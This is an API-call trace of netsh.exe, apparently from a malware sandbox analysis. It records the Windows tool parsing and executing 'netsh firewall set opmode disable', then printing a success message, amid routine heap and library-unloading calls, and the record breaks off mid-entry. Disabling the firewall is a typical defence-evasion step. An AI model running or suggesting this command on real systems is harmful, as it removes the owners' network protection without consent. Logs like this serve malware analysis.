[0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bc40 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlReAllocateHeap (Heap=0xc50000, Flags=0x0, Ptr=0xc8bc40, Size=0xe) returned 0xc8bb50 [0122.137] GetProcessHeap () returned 0xc50000 [0122.137] RtlReAllocateHeap (Heap=0xc50000, Flags=0x0, Ptr=0xc8bb50, Size=0x1e) returned 0xc77268 [0122.137] GetProcessHeap () returned 0xc50000 [0122.137] RtlReAllocateHeap (Heap=0xc50000, Flags=0x0, Ptr=0xc77268, Size=0x20) returned 0xc77380 [0122.137] GetProcessHeap () returned 0xc50000 [0122.137] RtlReAllocateHeap (Heap=0xc50000, Flags=0x0, Ptr=0xc77380, Size=0x26) returned 0xc7fca8 [0122.137] GetProcessHeap () returned 0xc50000 [0122.137] RtlReAllocateHeap (Heap=0xc50000, Flags=0x0, Ptr=0xc7fca8, Size=0x28) returned 0xc7ffd8 [0122.137] GetProcessHeap () returned 0xc50000 [0122.137] RtlReAllocateHeap (Heap=0xc50000, Flags=0x0, Ptr=0xc7ffd8, Size=0x34) returned 0xc765c8 [0122.137] GetProcessHeap () returned 0xc50000 [0122.137] RtlReAllocateHeap (Heap=0xc50000, Flags=0x0, Ptr=0xc765c8, Size=0x36) returned 0xc76608 [0122.137] GetProcessHeap () returned 0xc50000 [0122.137] RtlReAllocateHeap (Heap=0xc50000, Flags=0x0, Ptr=0xc76608, Size=0x44) returned 0xc875f0 [0122.137] GetProcessHeap () returned 0xc50000 [0122.137] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc875f0) returned 1 [0122.137] lstrcmpiW (lpString1="netsh", lpString2="namespace") returned 1 [0122.138] lstrcmpiW (lpString1="netsh", lpString2="branchcache") returned 1 [0122.138] lstrcmpiW (lpString1="netsh", lpString2="advfirewall") returned 1 [0122.138] lstrcmpiW (lpString1="netsh", lpString2="firewall") returned 1 [0122.138] lstrcmpiW (lpString1="netsh", lpString2="interface") returned 1 [0122.138] lstrcmpiW (lpString1="netsh", lpString2="dhcp") returned 1 [0122.138] lstrcmpiW (lpString1="netsh", lpString2="dnsclient") returned 1 [0122.138] lstrcmpiW (lpString1="netsh", lpString2="routing") returned -1 [0122.138] lstrcmpiW (lpString1="netsh", lpString2="ip") returned 1 [0122.138] lstrcmpiW (lpString1="netsh", lpString2="ipv6") returned 1 [0122.138] lstrcmpiW (lpString1="netsh", lpString2="aaaa") returned 1 [0122.138] lstrcmpiW (lpString1="netsh", lpString2="ras") returned -1 [0122.138] _wcsnicmp (_String1="firewall", _String2="dump", _MaxCount=0x8) returned 2 [0122.138] _wcsnicmp (_String1="firewall", _String2="help", _MaxCount=0x8) returned -2 [0122.138] _wcsnicmp (_String1="firewall", _String2="?", _MaxCount=0x8) returned 39 [0122.138] _wcsnicmp (_String1="firewall", _String2="exec", _MaxCount=0x8) returned 1 [0122.138] _wcsnicmp (_String1="firewall", _String2="advfirew", _MaxCount=0x8) returned 5 [0122.138] _wcsnicmp (_String1="firewall", _String2="branchca", _MaxCount=0x8) returned 4 [0122.138] _wcsnicmp (_String1="firewall", _String2="bridge", _MaxCount=0x8) returned 4 [0122.138] _wcsnicmp (_String1="firewall", _String2="dhcpclie", _MaxCount=0x8) returned 2 [0122.138] _wcsnicmp (_String1="firewall", _String2="dnsclien", _MaxCount=0x8) returned 2 [0122.138] _wcsnicmp (_String1="firewall", _String2="firewall", _MaxCount=0x8) returned 0 [0122.138] lstrcmpiW (lpString1="firewall", lpString2="namespace") returned -1 [0122.138] lstrcmpiW (lpString1="firewall", lpString2="branchcache") returned 1 [0122.138] lstrcmpiW (lpString1="firewall", lpString2="advfirewall") returned 1 [0122.138] lstrcmpiW (lpString1="firewall", lpString2="firewall") returned 0 [0122.138] GetProcessHeap () returned 0xc50000 [0122.138] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bdf0 [0122.138] GetProcessHeap () returned 0xc50000 [0122.138] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bce8 [0122.138] GetProcessHeap () returned 0xc50000 [0122.138] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x44) returned 0xc871e0 [0122.138] GetProcessHeap () returned 0xc50000 [0122.139] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bc88 [0122.139] GetProcessHeap () returned 0xc50000 [0122.139] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8be08 [0122.139] wcscpy_s (in: _Destination=0xc8be08, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0122.139] GetProcessHeap () returned 0xc50000 [0122.139] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bbc8 [0122.139] GetProcessHeap () returned 0xc50000 [0122.139] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x12) returned 0xc7c4c8 [0122.139] wcscpy_s (in: _Destination=0xc7c4c8, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0122.139] GetProcessHeap () returned 0xc50000 [0122.139] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bcb8 [0122.139] GetProcessHeap () returned 0xc50000 [0122.139] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc8c228 [0122.139] wcscpy_s (in: _Destination=0xc8c228, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0122.139] GetProcessHeap () returned 0xc50000 [0122.139] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bc58 [0122.139] GetProcessHeap () returned 0xc50000 [0122.139] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xe) returned 0xc8bb20 [0122.139] wcscpy_s (in: _Destination=0xc8bb20, _SizeInWords=0x7, _Source="opmode" | out: _Destination="opmode") returned 0x0 [0122.139] GetProcessHeap () returned 0xc50000 [0122.139] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bca0 [0122.139] GetProcessHeap () returned 0xc50000 [0122.139] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x10) returned 0xc8bd48 [0122.139] wcscpy_s (in: _Destination=0xc8bd48, _SizeInWords=0x8, _Source="disable" | out: _Destination="disable") returned 0x0 [0122.139] GetProcessHeap () returned 0xc50000 [0122.139] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc871e0) returned 1 [0122.139] GetProcessHeap () returned 0xc50000 [0122.139] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bce8) returned 1 [0122.139] GetProcessHeap () returned 0xc50000 [0122.139] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc7c4c8) returned 1 [0122.139] GetProcessHeap () returned 0xc50000 [0122.139] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x12) returned 0xc7c4c8 [0122.139] lstrcmpiW (lpString1="firewall", lpString2="routing") returned -1 [0122.139] lstrcmpiW (lpString1="firewall", lpString2="ip") returned -1 [0122.139] lstrcmpiW (lpString1="firewall", lpString2="ipv6") returned -1 [0122.139] lstrcmpiW (lpString1="firewall", lpString2="aaaa") returned 1 [0122.140] lstrcmpiW (lpString1="firewall", lpString2="ras") returned -1 [0122.140] _wcsnicmp (_String1="set", _String2="dum", _MaxCount=0x3) returned 15 [0122.140] _wcsnicmp (_String1="set", _String2="hel", _MaxCount=0x3) returned 11 [0122.140] _wcsnicmp (_String1="set", _String2="?", _MaxCount=0x3) returned 52 [0122.140] _wcsnicmp (_String1="set", _String2="res", _MaxCount=0x3) returned 1 [0122.140] _wcsnicmp (_String1="set", _String2="add", _MaxCount=0x3) returned 18 [0122.140] _wcsnicmp (_String1="set", _String2="del", _MaxCount=0x3) returned 15 [0122.140] _wcsnicmp (_String1="set", _String2="set", _MaxCount=0x3) returned 0 [0122.140] _wcsnicmp (_String1="opmode", _String2="help", _MaxCount=0x6) returned 7 [0122.140] _wcsnicmp (_String1="opmode", _String2="?", _MaxCount=0x6) returned 48 [0122.140] wcstok (in: _String="allowedprogram", _Delimiter=" ", _Context=0xc8a2a0 | out: _String="allowedprogram", _Context=0xc8a2a0) returned="allowedprogram" [0122.140] _wcsnicmp (_String1="opmode", _String2="allowe", _MaxCount=0x6) returned 14 [0122.140] wcstok (in: _String="icmpsetting", _Delimiter=" ", _Context=0xc8a2a0 | out: _String="icmpsetting", _Context=0xc8a2a0) returned="icmpsetting" [0122.140] _wcsnicmp (_String1="opmode", _String2="icmpse", _MaxCount=0x6) returned 6 [0122.140] wcstok (in: _String="logging", _Delimiter=" ", _Context=0xc8a2a0 | out: _String="logging", _Context=0xc8a2a0) returned="logging" [0122.140] _wcsnicmp (_String1="opmode", _String2="loggin", _MaxCount=0x6) returned 3 [0122.140] wcstok (in: _String="multicastbroadcastresponse", _Delimiter=" ", _Context=0xc8a2a0 | out: _String="multicastbroadcastresponse", _Context=0xc8a2a0) returned="multicastbroadcastresponse" [0122.140] _wcsnicmp (_String1="opmode", _String2="multic", _MaxCount=0x6) returned 2 [0122.140] wcstok (in: _String="notifications", _Delimiter=" ", _Context=0xc8a2a0 | out: _String="notifications", _Context=0xc8a2a0) returned="notifications" [0122.140] _wcsnicmp (_String1="opmode", _String2="notifi", _MaxCount=0x6) returned 1 [0122.140] wcstok (in: _String="opmode", _Delimiter=" ", _Context=0xc8a2a0 | out: _String="opmode", _Context=0xc8a2a0) returned="opmode" [0122.140] _wcsnicmp (_String1="opmode", _String2="opmode", _MaxCount=0x6) returned 0 [0122.140] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc8a2a0 | out: _String=0x0, _Context=0xc8a2a0) returned 0x0 [0122.140] _wcsnicmp (_String1="disable", _String2="help", _MaxCount=0x7) returned -4 [0122.140] _wcsnicmp (_String1="disable", _String2="?", _MaxCount=0x7) returned 37 [0122.140] lstrcmpiW (lpString1="firewall", lpString2="netsh") returned -1 [0122.140] WinSqmAddToStream () returned 0x2487 [0122.141] MatchEnumTag () returned 0x0 [0122.141] _wcsnicmp (_String1="disable", _String2="enable", _MaxCount=0x7) returned -1 [0122.141] _wcsnicmp (_String1="disable", _String2="disable", _MaxCount=0x7) returned 0 [0157.661] PrintError () returned 0x132 [0157.661] LoadStringW (in: hInstance=0x6df50000, uID=0x119a, lpBuffer=0x7ef808, cchBufferMax=16384 | out: lpBuffer="\nIMPORTANT: Command executed successfully.\nHowever, \"netsh firewall\" is deprecated;\nuse \"netsh advfirewall firewall\" instead.\nFor more information on using \"netsh advfirewall firewall\" commands\ninstead of \"netsh firewall\", see KB article 947709\nat https://go.microsoft.com/fwlink/?linkid=121488 .\n\n") returned 0x12a [0157.661] FormatMessageW (in: dwFlags=0x500, lpSource=0x7ef808, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x7ef804, nSize=0x0, Arguments=0x7ef800 | out: lpBuffer="鍈Ô\nIMPORTANT: Command executed successfully.\nHowever, \"netsh firewall\" is deprecated;\nuse \"netsh advfirewall firewall\" instead.\nFor more information on using \"netsh advfirewall firewall\" commands\ninstead of \"netsh firewall\", see KB article 947709\nat https://go.microsoft.com/fwlink/?linkid=121488 .\n\n") returned 0x132 [0157.661] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0157.661] GetConsoleOutputCP () returned 0x1b5 [0157.737] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\nIMPORTANT: Command executed successfully.\r\nHowever, \"netsh firewall\" is deprecated;\r\nuse \"netsh advfirewall firewall\" instead.\r\nFor more information on using \"netsh advfirewall firewall\" commands\r\ninstead of \"netsh firewall\", see KB article 947709\r\nat https://go.microsoft.com/fwlink/?linkid=121488 .\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 307 [0157.737] GetProcessHeap () returned 0xc50000 [0157.737] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x133) returned 0x5105cb8 [0157.737] GetConsoleOutputCP () returned 0x1b5 [0157.841] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\nIMPORTANT: Command executed successfully.\r\nHowever, \"netsh firewall\" is deprecated;\r\nuse \"netsh advfirewall firewall\" instead.\r\nFor more information on using \"netsh advfirewall firewall\" commands\r\ninstead of \"netsh firewall\", see KB article 947709\r\nat https://go.microsoft.com/fwlink/?linkid=121488 .\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x5105cb8, cbMultiByte=307, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nIMPORTANT: Command executed successfully.\r\nHowever, \"netsh firewall\" is deprecated;\r\nuse \"netsh advfirewall firewall\" instead.\r\nFor more information on using \"netsh advfirewall firewall\" commands\r\ninstead of \"netsh firewall\", see KB article 947709\r\nat https://go.microsoft.com/fwlink/?linkid=121488 .\r\n\r\n", lpUsedDefaultChar=0x0) returned 307 [0157.841] WriteFile (in: hFile=0x90, lpBuffer=0x5105cb8*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x7ef7e4, lpOverlapped=0x0 | out: lpBuffer=0x5105cb8*, lpNumberOfBytesWritten=0x7ef7e4*=0x132, lpOverlapped=0x0) returned 1 [0157.997] GetProcessHeap () returned 0xc50000 [0157.997] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x5105cb8) returned 1 [0157.997] LocalFree (hMem=0xd49348) returned 0x0 [0157.997] LoadStringW (in: hInstance=0x0, uID=0x2, lpBuffer=0x7ef8a4, cchBufferMax=16384 | out: lpBuffer="Ok.\n") returned 0x4 [0157.997] FormatMessageW (in: dwFlags=0x500, lpSource=0x7ef8a4, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x7ef888, nSize=0x0, Arguments=0x7ef8a0 | out: lpBuffer="?Æ碬\x7f胃śꂰ淵㪧") returned 0x5 [0157.997] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0157.997] GetConsoleOutputCP () returned 0x1b5 [0158.185] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.186] GetProcessHeap () returned 0xc50000 [0158.186] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6) returned 0xc8c2c8 [0158.186] GetConsoleOutputCP () returned 0x1b5 [0158.373] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0xc8c2c8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ok.\r\n", lpUsedDefaultChar=0x0) returned 6 [0158.373] WriteFile (in: hFile=0x90, lpBuffer=0xc8c2c8*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x7ef874, lpOverlapped=0x0 | out: lpBuffer=0xc8c2c8*, lpNumberOfBytesWritten=0x7ef874*=0x5, lpOverlapped=0x0) returned 1 [0158.627] GetProcessHeap () returned 0xc50000 [0158.628] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8c2c8) returned 1 [0158.628] LocalFree (hMem=0xc6dcb0) returned 0x0 [0158.628] FormatMessageW (in: dwFlags=0x500, lpSource=0x15b1310, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x7f78a0, nSize=0x0, Arguments=0x7f78ac | out: lpBuffer="볨È碰\x7f耰ś碼\x7f磔\x7f孳śጐśꊠÈ\x05") returned 0x2 [0158.628] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0158.628] GetConsoleOutputCP () returned 0x1b5 [0158.810] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0158.810] GetProcessHeap () returned 0xc50000 [0158.810] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x3) returned 0xc8c208 [0158.810] GetConsoleOutputCP () returned 0x1b5 [0158.991] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0xc8c208, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0158.991] WriteFile (in: hFile=0x90, lpBuffer=0xc8c208*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x7f788c, lpOverlapped=0x0 | out: lpBuffer=0xc8c208*, lpNumberOfBytesWritten=0x7f788c*=0x2, lpOverlapped=0x0) returned 1 [0159.161] GetProcessHeap () returned 0xc50000 [0159.161] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8c208) returned 1 [0159.161] LocalFree (hMem=0xc8bce8) returned 0x0 [0159.161] GetProcessHeap () returned 0xc50000 [0159.161] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bd30) returned 1 [0159.161] GetProcessHeap () returned 0xc50000 [0159.161] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc7c4a8) returned 1 [0159.161] GetProcessHeap () returned 0xc50000 [0159.161] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8c2d8) returned 1 [0159.161] GetProcessHeap () returned 0xc50000 [0159.161] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bdc0) returned 1 [0159.161] GetProcessHeap () returned 0xc50000 [0159.161] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bb98) returned 1 [0159.161] GetProcessHeap () returned 0xc50000 [0159.161] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc7c488) returned 1 [0159.161] GetProcessHeap () returned 0xc50000 [0159.161] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc7c528) returned 1 [0159.161] GetProcessHeap () returned 0xc50000 [0159.162] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bb38) returned 1 [0159.162] GetProcessHeap () returned 0xc50000 [0159.162] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8c268) returned 1 [0159.162] GetProcessHeap () returned 0xc50000 [0159.162] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bbb0) returned 1 [0159.162] GetProcessHeap () returned 0xc50000 [0159.162] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bd18) returned 1 [0159.162] GetProcessHeap () returned 0xc50000 [0159.162] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bcd0) returned 1 [0159.162] GetProcessHeap () returned 0xc50000 [0159.162] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bdd8) returned 1 [0159.162] GetProcessHeap () returned 0xc50000 [0159.162] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bda8) returned 1 [0159.162] GetProcessHeap () returned 0xc50000 [0159.162] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bd00) returned 1 [0159.162] GetProcessHeap () returned 0xc50000 [0159.162] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bd90) returned 1 [0159.162] GetProcessHeap () returned 0xc50000 [0159.162] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bc10) returned 1 [0159.162] GetProcessHeap () returned 0xc50000 [0159.162] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc79168) returned 1 [0159.283] GetProcessHeap () returned 0xc50000 [0159.283] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc80ad8) returned 1 [0159.284] FreeLibrary (hLibModule=0x15b0000) returned 1 [0159.284] FreeLibrary (hLibModule=0x6e4b0000) returned 1 [0159.285] FreeLibrary (hLibModule=0x6e2b0000) returned 1 [0159.292] free (_Block=0xf73918) [0159.293] LocalFree (hMem=0xc68cd8) returned 0x0 [0159.293] LocalFree (hMem=0xc68e58) returned 0x0 [0159.293] LocalFree (hMem=0xc68320) returned 0x0 [0159.293] LocalFree (hMem=0xc66208) returned 0x0 [0159.293] LocalAlloc (uFlags=0x40, uBytes=0x178) returned 0xc7cae0 [0159.293] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xc8bcd0 [0159.293] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0xc8bd30 [0159.293] free (_Block=0xf711a0) [0159.293] free (_Block=0x0) [0159.293] free (_Block=0xf71188) [0159.293] free (_Block=0xf738d0) [0159.293] free (_Block=0xf711b8) [0159.294] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x50f0780 [0159.295] LocalFree (hMem=0x50f0780) returned 0x0 [0159.295] LocalFree (hMem=0xc68ee8) returned 0x0 [0159.295] LocalFree (hMem=0xc7cae0) returned 0x0 [0159.295] free (_Block=0xf71080) [0159.296] GetModuleHandleA (lpModuleName="MSVCRT.DLL") returned 0x77640000 [0159.296] FreeLibrary (hLibModule=0x77640000) returned 1 [0159.296] LocalFree (hMem=0xc8bd30) returned 0x0 [0159.296] LocalFree (hMem=0xc8bcd0) returned 0x0 [0159.296] GlobalHandle (pMem=0xc68bc8) returned 0xbb0004 [0159.296] GlobalUnlock (hMem=0xbb0004) returned 0 [0159.301] FreeLibrary (hLibModule=0x6e110000) returned 1 [0159.302] FreeLibrary (hLibModule=0x6e040000) returned 1 [0159.304] FreeLibrary (hLibModule=0x6e020000) returned 1 [0159.368] FreeLibrary (hLibModule=0x6df50000) returned 1 [0159.372] FreeLibrary (hLibModule=0x6df40000) returned 1 [0159.416] FreeLibrary (hLibModule=0x6c350000) returned 1 [0159.428] FreeLibrary (hLibModule=0x6c340000) returned 1 [0159.429] FreeLibrary (hLibModule=0x6c2c0000) returned 1 [0159.461] FreeLibrary (hLibModule=0x6c100000) returned 1 [0159.463] FreeLibrary (hLibModule=0x6e460000) returned 1 [0159.467] FreeLibrary (hLibModule=0x6e420000) returned 1 [0159.469] FreeLibrary (hLibModule=0x6e410000) returned 1 [0159.469] FreeLibrary (hLibModule=0x6e3d0000) returned 1 [0159.492] FreeLibrary (hLibModule=0x6e380000) returned 1 [0159.676] FreeLibrary (hLibModule=0x6bf60000) returned 1 [0159.897] GetProcessHeap () returned 0xc50000 [0159.897] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc77d38) returned 1 [0159.897] GetProcessHeap () returned 0xc50000 [0159.897] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5b418) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5b538) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5b438) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5b548) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5b448) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5b4b8) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5b558) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cf80) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ce80) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cfe0) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cfd0) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cf30) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cf50) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cec0) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cf70) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ce60) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cf60) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cfb0) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ce50) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d000) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cf90) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.898] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cff0) returned 1 [0159.898] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d010) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cfa0) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cfc0) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cef0) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cf20) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cf00) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ce70) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cf10) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ce90) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ced0) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cea0) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cf40) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ceb0) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cee0) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cc70) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ccf0) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, 